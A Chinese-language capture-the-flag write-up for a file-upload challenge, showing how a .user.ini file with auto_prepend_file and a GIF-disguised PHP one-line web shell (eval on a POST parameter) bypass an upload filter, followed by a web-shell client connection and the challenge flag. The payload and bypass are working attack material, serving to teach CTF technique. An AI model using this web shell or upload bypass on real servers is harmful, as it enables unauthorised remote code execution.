青少年CTF练习平台~Upload3

Hacker_seagull2026-01-18 17:18

目录

题目链接

https://www.qsnctf.com/

一、题目介绍

这次我学聪明啦!老板说要对上传点进行php的大小写过滤!这下看你怎么办!

二、上传.user.ini文件

bash 复制代码 
auto_prepend_file=shell.png

上传成功

三、上传图片马(shell.png)

bash 复制代码 
GIF89a
<?php @eval($_POST['cmd']);?>

上传成功

四、访问首页文件

当访问 index.php 时,PHP 引擎启动,读取目录下的 .user.ini,发现配置要求先加载 sell.png,于是它会先执行 shell.png 里的恶意代码,再执行首页原本的代码。

五、连接蚁剑

启动蚁剑连接shell(pass:cmd)

http://challenge.qsnctf.com:33578/index.php

连接成功

flag在根目录

flag{8ebfefb382d94eed9e1ef57e401492e7}

相关推荐
内心如初3 小时前
03_等保系列之1.0和2.0对比
网络安全·等保测评·等保测评从0-1·等保测评笔记
内心如初7 小时前
04_等保系列之云等保
网络安全·等保测评·等保测评从0-1·等保测评笔记
小小代码狗8 小时前
PHP伪协议和文件包含
网络·网络安全·php
吃不得辣条9 小时前
渗透学习小结
学习·网络安全
恃宠而骄的佩奇9 小时前
APP客户端安全评估思路及工具分享
测试工具·安全·网络安全·app客户端安全评估
夜未央3110 小时前
HTTPS 原理与 PHP 文件包含及伪协议详解
运维·服务器·安全·网络安全
云安全干货局10 小时前
深度解析:高防 IP 如何实现 “隐藏源站 IP”?核心技术原理拆解
网络·网络安全·高防ip
Whoami!11 小时前
❿⁄₁₃ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击实践 ➱ 获取并破解Net-NTLMv2哈希(下)
网络安全·信息安全·密码破解原理·net-ntlmv2哈希
恃宠而骄的佩奇11 小时前
网络安全面试题——安全服务
web安全·网络安全·面试·奇安信
热门推荐
01GitHub 镜像站点022025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)03Linux下V2Ray安装配置指南042025年大语言模型技术全景报告05UV安装并设置国内源06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07Labelme从安装到标注:零基础完整指南08BongoCat - 跨平台键盘猫动画工具09Claude Code Skills 实用使用手册10jdk21下载、安装(Windows、Linux、macOS)